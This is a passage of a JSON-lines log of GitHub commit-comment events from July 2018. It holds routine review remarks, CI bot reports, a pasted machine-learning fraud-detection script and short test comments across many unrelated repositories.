{"id":"8042587424","type":"CommitCommentEvent","actor":{"login":"Txucishvili"},"repo":{"name":"Txucishvili/check"},"payload":{"comment":{"id":29900399,"position":6,"line":6,"path":"check/index.html","commit_id":"f0e8e236bc75fed6083dae7878089d04d861a190","created_at":"2018-07-31T08:38:57Z","updated_at":"2018-07-31T08:38:57Z","author_association":"OWNER","body":"back"}},"created_at":"2018-07-31T08:38:57Z"}
{"id":"8042587654","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900400,"position":655,"line":655,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:39:00Z","updated_at":"2018-07-31T08:39:00Z","author_association":"NONE","body":"Это не должно быть тэгом заголовка)"}},"created_at":"2018-07-31T08:39:00Z"}
{"id":"8042587689","type":"CommitCommentEvent","actor":{"login":"Abhinav641"},"repo":{"name":"Abhinav641/hello-world"},"payload":{"comment":{"id":29900401,"position":null,"line":null,"path":null,"commit_id":"128217c50c3ce4208c3245e7bb7e890b703c4c7b","created_at":"2018-07-31T08:39:00Z","updated_at":"2018-07-31T08:39:00Z","author_association":"OWNER","body":"My name is Abhinav Jain. I have done B.Tech from Amity University Noida, I have interest in Java and I am a quick lerner. I have a very helping nature so I never step back when it comes to helping others. I am very hard working so I never leave the task undone and complete it everytime."}},"created_at":"2018-07-31T08:39:00Z"}
{"id":"8042591628","type":"CommitCommentEvent","actor":{"login":"chandureddy5041"},"repo":{"name":"yogis-github/flash"},"payload":{"comment":{"id":29900411,"position":5,"line":5,"path":"Abstraction/src/com/Abstraction/AbstractionEx.java","commit_id":"6f16e93cc76a86992a00ac89e0abea61c63b0dd0","created_at":"2018-07-31T08:39:46Z","updated_at":"2018-07-31T08:39:46Z","author_association":"NONE","body":"add some more abstract methods"}},"created_at":"2018-07-31T08:39:46Z"}
{"id":"8042593477","type":"CommitCommentEvent","actor":{"login":"Shent"},"repo":{"name":"fozodavid/react-webshop"},"payload":{"comment":{"id":29900415,"position":3,"line":2,"path":"package.json","commit_id":"051e9288ba873e6e0225de7e425a349947a1e498","created_at":"2018-07-31T08:40:09Z","updated_at":"2018-07-31T08:40:09Z","author_association":"NONE","body":"This is an invalid package name due to the spaces and does not compile with YARN. However was easy to fix, so no worries at all."}},"created_at":"2018-07-31T08:40:09Z"}
{"id":"8042594243","type":"CommitCommentEvent","actor":{"login":"jeroen"},"repo":{"name":"jeroen/openssl"},"payload":{"comment":{"id":29900416,"position":4,"line":10,"path":"NEWS","commit_id":"6570beaa960f15ef409f1cd50298690a2c0dc3a3","created_at":"2018-07-31T08:40:16Z","updated_at":"2018-07-31T08:40:16Z","author_association":"OWNER","body":"Thanks! Fixed in master."}},"created_at":"2018-07-31T08:40:16Z"}
{"id":"8042595057","type":"CommitCommentEvent","actor":{"login":"malbach"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29900419,"position":null,"line":null,"path":null,"commit_id":"b3919dcb44988c72a46e3b97beb41fba68219d4c","created_at":"2018-07-31T08:40:25Z","updated_at":"2018-07-31T08:40:25Z","author_association":"CONTRIBUTOR","body":"Hi,\r\nSorry I can't explain why but I had to change \r\n```C++\r\n#ifdef WINDOWS_ENABLED\r\n```\r\nto \r\n```C++\r\n#ifndef WINDOWS_ENABLED\r\n```\r\nto be able to compile with VS2017 (Win10 x64)"}},"created_at":"2018-07-31T08:40:25Z"}
{"id":"8042598452","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900423,"position":13,"line":13,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:41:03Z","updated_at":"2018-07-31T08:41:03Z","author_association":"NONE","body":"не используй инлайновые ивент лисенеры внутри html\r\nВыноси это в джаваскрипт и юзай [`element.addEventListener()`](https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener)"}},"created_at":"2018-07-31T08:41:03Z"}
{"id":"8042602884","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29900437,"position":null,"line":null,"path":null,"commit_id":"920adb9a8a8e7b5953947574503efa9963b88ee3","created_at":"2018-07-31T08:41:55Z","updated_at":"2018-07-31T08:41:55Z","author_association":"MEMBER","body":"@zhangmin93 https://github.com/ant-design/ant-design/commit/aa6b55be7e6b87e679feff4797f81e390beb2d3f"}},"created_at":"2018-07-31T08:41:55Z"}
{"id":"8042604831","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29900438,"position":null,"line":null,"path":null,"commit_id":"16bfa0e843c29d6245631b4335f6e6ef0d47cc8d","created_at":"2018-07-31T08:42:18Z","updated_at":"2018-07-31T08:42:18Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (RKStrand) - Win64-Windows-7-VisualStudio-14: OK (2955 of 2955 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T08:42:18Z"}
{"id":"8042606744","type":"CommitCommentEvent","actor":{"login":"yezhongmang"},"repo":{"name":"yezhongmang/DemoRepository"},"payload":{"comment":{"id":29900446,"position":null,"line":null,"path":null,"commit_id":"a8793128bcb1a4bd82c7c9ce8fe31c8f7d3f7a13","created_at":"2018-07-31T08:42:40Z","updated_at":"2018-07-31T08:42:40Z","author_association":"OWNER","body":"这里对文件做了些许修改"}},"created_at":"2018-07-31T08:42:40Z"}
{"id":"8042607294","type":"CommitCommentEvent","actor":{"login":"Shent"},"repo":{"name":"fozodavid/react-webshop"},"payload":{"comment":{"id":29900447,"position":null,"line":null,"path":null,"commit_id":"e2db61478e09fb749491a4939f9cdb5e984ddff3","created_at":"2018-07-31T08:42:46Z","updated_at":"2018-07-31T08:42:46Z","author_association":"NONE","body":"Review completed - very well done. \r\nPassed."}},"created_at":"2018-07-31T08:42:46Z"}
{"id":"8042607549","type":"CommitCommentEvent","actor":{"login":"burbas"},"repo":{"name":"burbas/burbweb"},"payload":{"comment":{"id":29900449,"position":null,"line":null,"path":null,"commit_id":"1d74eb26af57f8216495ce7820f9202dbe4f7093","created_at":"2018-07-31T08:42:49Z","updated_at":"2018-07-31T08:42:49Z","author_association":"OWNER","body":"This looks good. Feel free to merge this if it passes 👍 "}},"created_at":"2018-07-31T08:42:49Z"}
{"id":"8042607764","type":"CommitCommentEvent","actor":{"login":"nuoHep"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29900451,"position":null,"line":null,"path":null,"commit_id":"5bc348981d0c5bfdfab53996753fec7cf0164f53","created_at":"2018-07-31T08:42:51Z","updated_at":"2018-07-31T08:42:51Z","author_association":"CONTRIBUTOR","body":"This was already implemented in https://github.com/simulationcraft/simc/commit/b814554ed7e2bfd6058f8642ab514d75426030a6"}},"created_at":"2018-07-31T08:42:51Z"}
{"id":"8042608764","type":"CommitCommentEvent","actor":{"login":"yezhongmang"},"repo":{"name":"yezhongmang/DemoRepository"},"payload":{"comment":{"id":29900452,"position":2,"line":2,"path":"README.md","commit_id":"a8793128bcb1a4bd82c7c9ce8fe31c8f7d3f7a13","created_at":"2018-07-31T08:43:03Z","updated_at":"2018-07-31T08:43:03Z","author_association":"OWNER","body":"这里对文件做了一点修改"}},"created_at":"2018-07-31T08:43:03Z"}
{"id":"8042614367","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29900463,"position":null,"line":null,"path":null,"commit_id":"9434908f43bfe4e3ad466be85e2e115990b32a2f","created_at":"2018-07-31T08:44:06Z","updated_at":"2018-07-31T08:44:06Z","author_association":"CONTRIBUTOR","body":"I'm not sure to understand this one. You are forcing targets to nullptr when `TargetA=TARGET_CASTER_COORDINATES` whitout any regard of TargetB? What will happen for spells like 17441 that needs to select only enemies around caster (a GO) so they can cast the triggered spell 18733 onto themself (spell is self target)? Or spell 9798 that have the same logic with friendlies instead of enemies?"}},"created_at":"2018-07-31T08:44:06Z"}
{"id":"8042614656","type":"CommitCommentEvent","actor":{"login":"SAHX"},"repo":{"name":"AmilyCi/fe-demo"},"payload":{"comment":{"id":29900464,"position":15,"line":15,"path":"count down/index.html","commit_id":"798c0f672124105a239ff0603d6297d954310be9","created_at":"2018-07-31T08:44:09Z","updated_at":"2018-07-31T08:44:09Z","author_association":"NONE","body":"这里空行太多，如果只是引入js，直接写<script type=\"text/javascript\" src=\"index.js\"></script>"}},"created_at":"2018-07-31T08:44:09Z"}
{"id":"8042633106","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29900522,"position":45,"line":920,"path":"fabfile.py","commit_id":"9d58221a74026b4db15b35c40507cd25c3d22cb8","created_at":"2018-07-31T08:47:35Z","updated_at":"2018-07-31T08:47:35Z","author_association":"CONTRIBUTOR","body":"T'es pas obligé de précisé le service bluenoveact ici, mais ça marche aussi."}},"created_at":"2018-07-31T08:47:35Z"}
{"id":"8042634128","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29900523,"position":null,"line":null,"path":null,"commit_id":"9434908f43bfe4e3ad466be85e2e115990b32a2f","created_at":"2018-07-31T08:47:47Z","updated_at":"2018-07-31T08:47:47Z","author_association":"CONTRIBUTOR","body":"Its actually very simple. TARGET_CASTER_COORDINATES is associated with AOEs, and most AOEs (not all mind you), have SMSG_SPELL_START void of any target (target flags 0). This is equivalent to passing nullptr to castspell. TARGET_CASTER_COORDINATES supplies SOURCE_LOCATION if I recall correctly, which tends to be used with a TARGET_B that searches for aoe targets. (since there are no source location executed effects)\r\n\r\nPassing nullptr is actually a LOT more common than passing target, especially during scripts. When you pass triggerTarget or simply any target to castspell, it automaticaly shows up in SMSG_SPELL_START with unit target."}},"created_at":"2018-07-31T08:47:47Z"}
{"id":"8042634485","type":"CommitCommentEvent","actor":{"login":"shahad12345"},"repo":{"name":"shahad12345/portfolio"},"payload":{"comment":{"id":29900526,"position":null,"line":null,"path":null,"commit_id":"9c04974b56dd4d2cd79c96c0f1ff55418e54b819","created_at":"2018-07-31T08:47:51Z","updated_at":"2018-07-31T08:47:51Z","author_association":"OWNER","body":"shahad"}},"created_at":"2018-07-31T08:47:51Z"}
{"id":"8042635906","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"Alej0hio/Alej0hibot"},"payload":{"comment":{"id":29900530,"position":null,"line":null,"path":null,"commit_id":"f57931c40335cf07931eda2df2c8a4165a318096","created_at":"2018-07-31T08:48:08Z","updated_at":"2018-07-31T08:48:08Z","author_association":"OWNER","body":"Whoops, meant vBETA-2 GithubRelease."}},"created_at":"2018-07-31T08:48:08Z"}
{"id":"8042636313","type":"CommitCommentEvent","actor":{"login":"sooo1113yyy"},"repo":{"name":"geoblo/fingertrip"},"payload":{"comment":{"id":29900531,"position":null,"line":null,"path":null,"commit_id":"8030cd34aac17a55a29e7e36b067bad9a32a7899","created_at":"2018-07-31T08:48:12Z","updated_at":"2018-07-31T08:48:12Z","author_association":"COLLABORATOR","body":"관리자 페이지 \r\n로그인뷰, 틀을 작성"}},"created_at":"2018-07-31T08:48:12Z"}
{"id":"8042638533","type":"CommitCommentEvent","actor":{"login":"shahad12345"},"repo":{"name":"shahad12345/portfolio"},"payload":{"comment":{"id":29900532,"position":null,"line":null,"path":null,"commit_id":"9c04974b56dd4d2cd79c96c0f1ff55418e54b819","created_at":"2018-07-31T08:48:37Z","updated_at":"2018-07-31T08:48:37Z","author_association":"OWNER","body":"https://github.com/shahad12345/portfolio/blob/readme-edits/README.md#portfolio"}},"created_at":"2018-07-31T08:48:37Z"}
{"id":"8042641609","type":"CommitCommentEvent","actor":{"login":"jihad55"},"repo":{"name":"jihad55/som"},"payload":{"comment":{"id":29900535,"position":null,"line":null,"path":null,"commit_id":"89f8a1549dd94df77445f15d8d69ebf44d67b8d8","created_at":"2018-07-31T08:49:13Z","updated_at":"2018-07-31T08:49:13Z","author_association":"OWNER","body":"#som\r\n\r\n#part 1 identify frauds with som\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n #importing dataset\r\ndataset = pd.read_csv('Credit_Card_Applications.csv')\r\nX = dataset.iloc[:, : -1].values\r\ny = dataset.iloc[:, -1].values\r\n #feature scaling\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nsc = MinMaxScaler(feature_range = (0, 1))\r\nX = sc.fit_transform(X)\r\n #training som\r\nfrom minisom import MiniSom\r\nsom = MiniSom(x = 10, y = 10, input_len = 15, sigma = 1.0, learning_rate = 0.5)\r\nsom.random_weights_init(X)\r\nsom.train_random(data = X, num_iteration = 100)\r\n #visulaising results\r\nfrom pylab import bone, pcolor, colorbar, show, plot\r\nbone()\r\npcolor(som.distance_map().T)\r\ncolorbar()\r\nmarkers = ['o' , 's']\r\ncolors = ['r', 'g']\r\nfor i, x in enumerate(X):\r\n    w= som.winner(x)\r\n    plot(w[0] + 0.5,\r\n         w[1] + 0.5,\r\n         markers[y[i]],\r\n         markeredgecolor = colors[y[i]],\r\n         markerfacecolor = 'None',\r\n         markersize = 10,\r\n         markeredgewidth = 2)\r\nshow()\r\n #finding the ferads\r\nmappings = som.win_map(X)\r\nfrauds = np.concatenate((mappings[(2,7)], mappings[(5,2)]), axis =0)\r\nfrauds = sc.inverse_transform(frauds)\r\n\r\n\r\n#part 2 going from unsupervised to supervised deep learning\r\n\r\n#creating metrics frauds\r\ncostumers = dataset.iloc[:, 1: ].values\r\n\r\n#creating dependent variables\r\nis_fraud = np.zeros(len(dataset))\r\nfor i in range(len(dataset)):\r\n    if dataset.iloc[i,0] in frauds:\r\n        is_fraud[i]=1\r\n        \r\n        \r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\ncostumers = sc.fit_transform(costumers)\r\n\r\n# Part 2 - Now let's make the ANN!\r\n\r\n# Importing the Keras libraries and packages\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\n# Initialising the ANN\r\nclassifier = Sequential()\r\n\r\n# Adding the input layer and the first hidden layer\r\nclassifier.add(Dense(units = 2, kernel_initializer = 'uniform', activation = 'relu', input_dim = 15))\r\n\r\n# Adding the output layer\r\nclassifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid'))\r\n\r\n# Compiling the ANN\r\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\r\n\r\n# Fitting the ANN to the Training set\r\nclassifier.fit(costumers, is_fraud, batch_size = 1, epochs = 2)\r\n\r\n# Predicting the propabilities\r\ny_pred = classifier.predict(costumers)\r\ny_pred = np.concatenate((dataset.iloc[:, 0:1].values, y_pred), axis =1)\r\ny_pred = y_pred[y_pred[:, 1].argsort()]"}},"created_at":"2018-07-31T08:49:13Z"}
{"id":"8042643892","type":"CommitCommentEvent","actor":{"login":"Xavier-Do"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29900538,"position":14,"line":14,"path":"addons/im_livechat_mail_bot/models/mail_bot.py","commit_id":"67fe8f2b14ecc5b79c90623b45045c8618b6daf3","created_at":"2018-07-31T08:49:39Z","updated_at":"2018-07-31T08:49:39Z","author_association":"NONE","body":"we need to remove canned_response_ids from values for create"}},"created_at":"2018-07-31T08:49:39Z"}
{"id":"8042646608","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29900542,"position":null,"line":null,"path":null,"commit_id":"4162b14067851ffd5f587078f4d6ed43e4424d42","created_at":"2018-07-31T08:50:11Z","updated_at":"2018-07-31T08:50:11Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-335](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-335).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-335-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-31T08:50:11Z"}
{"id":"8042647775","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29900547,"position":null,"line":null,"path":null,"commit_id":"9434908f43bfe4e3ad466be85e2e115990b32a2f","created_at":"2018-07-31T08:50:24Z","updated_at":"2018-07-31T08:50:24Z","author_association":"CONTRIBUTOR","body":"Also reason why this is even important. Many aoes have a spell attribute CANT_TARGET_SELF. If you pass a target with self to castspell, then checkcast will prevent this spell from going off, because that attribute checks whether you are mistakenly targeting yourself."}},"created_at":"2018-07-31T08:50:24Z"}
{"id":"8042649045","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29900549,"position":null,"line":null,"path":null,"commit_id":"970edf152e817fe5ace2bda7168fc1b6d0233371","created_at":"2018-07-31T08:50:39Z","updated_at":"2018-07-31T08:50:39Z","author_association":"CONTRIBUTOR","body":"From OpenPLi...\r\nhttps://github.com/OpenPLi/enigma2/commit/550ba650c66433100ff84438766a5cdd5dddff55"}},"created_at":"2018-07-31T08:50:39Z"}
{"id":"8042649504","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"awssat/laravel-visits"},"payload":{"comment":{"id":29900552,"position":22,"line":51,"path":"src/Visits.php","commit_id":"d7ff826f58011dfd0549f087f6ad157034b51705","created_at":"2018-07-31T08:50:44Z","updated_at":"2018-07-31T08:50:44Z","author_association":"NONE","body":"This should be : \r\n\r\n> $config = config('visits');"}},"created_at":"2018-07-31T08:50:44Z"}
{"id":"8042651281","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29900555,"position":null,"line":null,"path":null,"commit_id":"75acdc53a0fd4cef78b16c1b6e68d50060bfa72c","created_at":"2018-07-31T08:51:06Z","updated_at":"2018-07-31T08:51:06Z","author_association":"CONTRIBUTOR","body":"test comment 2"}},"created_at":"2018-07-31T08:51:06Z"}
{"id":"8042652985","type":"CommitCommentEvent","actor":{"login":"sylr"},"repo":{"name":"Azure/acs-engine"},"payload":{"comment":{"id":29900556,"position":167,"line":167,"path":"parts/k8s/addons/1.10/kubernetesmasteraddons-kube-dns-deployment.yaml","commit_id":"4bee179947cd1a2a1d3965c46bb22f808b4bfc79","created_at":"2018-07-31T08:51:24Z","updated_at":"2018-07-31T08:51:24Z","author_association":"CONTRIBUTOR","body":"Should be <kubernetesKubeletClusterDomain> here"}},"created_at":"2018-07-31T08:51:24Z"}
{"id":"8042653436","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29900557,"position":null,"line":null,"path":null,"commit_id":"fc4aadef02c12da6c60a519dd2df66f8c56bb0e2","created_at":"2018-07-31T08:51:30Z","updated_at":"2018-07-31T08:51:30Z","author_association":"CONTRIBUTOR","body":"Out of curiosity, what creature uses this? Usually, when something needs to do damage/effect on players without being selectable/attackable, Blizzard use GameObject or Dummy/Trigger NPCs with passive trigger aura (or script). No creature that could use this flag comes to my mind in Classic but I might be wrong."}},"created_at":"2018-07-31T08:51:30Z"}
{"id":"8042656234","type":"CommitCommentEvent","actor":{"login":"jdemeyer"},"repo":{"name":"jdemeyer/cpython"},"payload":{"comment":{"id":29900562,"position":22,"line":350,"path":"Include/object.h","commit_id":"ea8e94921f528544865e49352413eb2101e7640c","created_at":"2018-07-31T08:52:03Z","updated_at":"2018-07-31T08:52:03Z","author_association":"OWNER","body":"> I meant this. https://bugs.python.org/issue29259#msg285416\r\n\r\nOn that issue, Serhiy wrote \"For compatibility with extensions built with older Pythons you should define new type flag and read `tp_fastcall` only if the flag is set\" and that is correct. But that's also what I do: I add a flag `Py_TPFLAGS_HAVE_CCALL`."}},"created_at":"2018-07-31T08:52:03Z"}
{"id":"8042656491","type":"CommitCommentEvent","actor":{"login":"martinandersen"},"repo":{"name":"cvxopt/cvxopt"},"payload":{"comment":{"id":29900563,"position":null,"line":null,"path":null,"commit_id":"99eca57602c33c93c9d1877a33ebc51255892917","created_at":"2018-07-31T08:52:05Z","updated_at":"2018-07-31T08:52:05Z","author_association":"CONTRIBUTOR","body":"Fixes #126"}},"created_at":"2018-07-31T08:52:05Z"}
{"id":"8042659923","type":"CommitCommentEvent","actor":{"login":"JoPoll"},"repo":{"name":"JoPoll/hello-world"},"payload":{"comment":{"id":29900570,"position":null,"line":null,"path":null,"commit_id":"7ca536ea6e93c155d440066e65602f6b65982137","created_at":"2018-07-31T08:52:45Z","updated_at":"2018-07-31T08:52:45Z","author_association":"OWNER","body":"war halt noch ein update"}},"created_at":"2018-07-31T08:52:45Z"}
{"id":"8042662263","type":"CommitCommentEvent","actor":{"login":"krystian3w"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29900575,"position":null,"line":null,"path":null,"commit_id":"a06d36576cdc3b65bf5aa61b4fdc7d4685b9fe0d","created_at":"2018-07-31T08:53:11Z","updated_at":"2018-07-31T08:53:11Z","author_association":"COLLABORATOR","body":"W sumie u mnie na Operze nagle działa, najwięcej problemu robił scroll."}},"created_at":"2018-07-31T08:53:11Z"}
{"id":"8042662487","type":"CommitCommentEvent","actor":{"login":"JoPoll"},"repo":{"name":"JoPoll/hello-world"},"payload":{"comment":{"id":29900576,"position":null,"line":null,"path":null,"commit_id":"7ca536ea6e93c155d440066e65602f6b65982137","created_at":"2018-07-31T08:53:13Z","updated_at":"2018-07-31T08:53:13Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-31T08:53:13Z"}
{"id":"8042667359","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29900585,"position":null,"line":null,"path":null,"commit_id":"fc4aadef02c12da6c60a519dd2df66f8c56bb0e2","created_at":"2018-07-31T08:54:09Z","updated_at":"2018-07-31T08:54:09Z","author_association":"CONTRIBUTOR","body":"I am unsure if its utilized in vanilla, it might be, @AnonXS has been adding a few. The number one reason why I first implemented this in SD2 and later added to DB was Prince Malchezaar Axes. They are unattackable, unkillable, yet they assault players. Confirmed with sniffs across several version. Since then I remember that someone said there are more mobs like this. I remember coming across a weapon creature in netherstorm as well. Usually these are pets that despawn with their master."}},"created_at":"2018-07-31T08:54:09Z"}
{"id":"8042668957","type":"CommitCommentEvent","actor":{"login":"pwwzj"},"repo":{"name":"pwwzj/helloworld"},"payload":{"comment":{"id":29900588,"position":null,"line":null,"path":null,"commit_id":"848794b9d3f7a982f2da05babab5aec4a9b4837b","created_at":"2018-07-31T08:54:27Z","updated_at":"2018-07-31T08:54:27Z","author_association":"OWNER","body":"before: jquery bootstrap\r\nafter:ssm\r\ndb:mysql\r\njust a demo."}},"created_at":"2018-07-31T08:54:27Z"}
{"id":"8042669351","type":"CommitCommentEvent","actor":{"login":"waldyrious"},"repo":{"name":"pcottle/learnGitBranching"},"payload":{"comment":{"id":29900593,"position":9,"line":73,"path":"src/template.index.html","commit_id":"9a60b082f35d26316ac240934826365b68c6ea53","created_at":"2018-07-31T08:54:31Z","updated_at":"2018-07-31T08:54:31Z","author_association":"CONTRIBUTOR","body":"@pcottle looks like spam or testing. I'd delete this entire comment thread."}},"created_at":"2018-07-31T08:54:31Z"}
{"id":"8042671282","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29900595,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-31T08:54:53Z","updated_at":"2018-07-31T08:54:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T08:54:53Z"}
{"id":"8042674464","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"awssat/laravel-visits"},"payload":{"comment":{"id":29900605,"position":33,"line":64,"path":"src/Visits.php","commit_id":"d7ff826f58011dfd0549f087f6ad157034b51705","created_at":"2018-07-31T08:55:29Z","updated_at":"2018-07-31T08:55:29Z","author_association":"NONE","body":"The connect setup should be put in the `config/visits.php` file, it helps the document and makes more sense.  Can reference to the `config/session.php` file, session has the same problem as this one , see https://github.com/laravel/framework/issues/10288 . \r\n\r\nIn the Laravel session case, they put something like: \r\n\r\n```\r\n\r\n    /*\r\n    |--------------------------------------------------------------------------\r\n    | Session Database Connection\r\n    |--------------------------------------------------------------------------\r\n    |\r\n    | When using the \"database\" or \"redis\" session drivers, you may specify a\r\n    | connection that should be used to manage these sessions. This should\r\n    | correspond to a connection in your database configuration options.\r\n    |\r\n    */\r\n\r\n    'connection' => 'session',\r\n```"}},"created_at":"2018-07-31T08:55:29Z"}
{"id":"8042675552","type":"CommitCommentEvent","actor":{"login":"ReeCore"},"repo":{"name":"ipsum-network/ips-explorer"},"payload":{"comment":{"id":29900608,"position":null,"line":null,"path":null,"commit_id":"e39654df388a12e0c3e16da75a166d74f5678a25","created_at":"2018-07-31T08:55:42Z","updated_at":"2018-07-31T08:55:42Z","author_association":"NONE","body":"Thanks. I fix my explorer with that"}},"created_at":"2018-07-31T08:55:42Z"}
{"id":"8042678380","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900614,"position":695,"line":695,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:56:13Z","updated_at":"2018-07-31T08:56:13Z","author_association":"NONE","body":"онклик в джаваскрипт перемещай"}},"created_at":"2018-07-31T08:56:13Z"}
{"id":"8042680186","type":"CommitCommentEvent","actor":{"login":"mblacanin"},"repo":{"name":"ValYouW/ml-ocr-tool"},"payload":{"comment":{"id":29900618,"position":null,"line":null,"path":null,"commit_id":"e633b107b79c43e10450f8c797775ba67547591f","created_at":"2018-07-31T08:56:34Z","updated_at":"2018-07-31T08:56:34Z","author_association":"NONE","body":"Hi, where I can find oneVsAll.m file?\r\nI can't run this without that."}},"created_at":"2018-07-31T08:56:34Z"}
{"id":"8042682477","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29900624,"position":null,"line":null,"path":null,"commit_id":"75acdc53a0fd4cef78b16c1b6e68d50060bfa72c","created_at":"2018-07-31T08:56:59Z","updated_at":"2018-07-31T08:56:59Z","author_association":"CONTRIBUTOR","body":"test commit 12"}},"created_at":"2018-07-31T08:56:59Z"}
{"id":"8042682828","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900627,"position":712,"line":712,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:57:04Z","updated_at":"2018-07-31T08:57:04Z","author_association":"NONE","body":"у инпутов по дэфолту тип текст, не надо писать `type=\"text\"`"}},"created_at":"2018-07-31T08:57:04Z"}
{"id":"8042684397","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29900629,"position":null,"line":null,"path":null,"commit_id":"2e2fe9298686fded5ad22d112335d1b52d585b13","created_at":"2018-07-31T08:57:20Z","updated_at":"2018-07-31T08:57:20Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/36/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/36//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/2e2fe9298686fded5ad22d112335d1b52d585b13/36/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/2e2fe9298686fded5ad22d112335d1b52d585b13/36/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/2e2fe9298686fded5ad22d112335d1b52d585b13/36/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 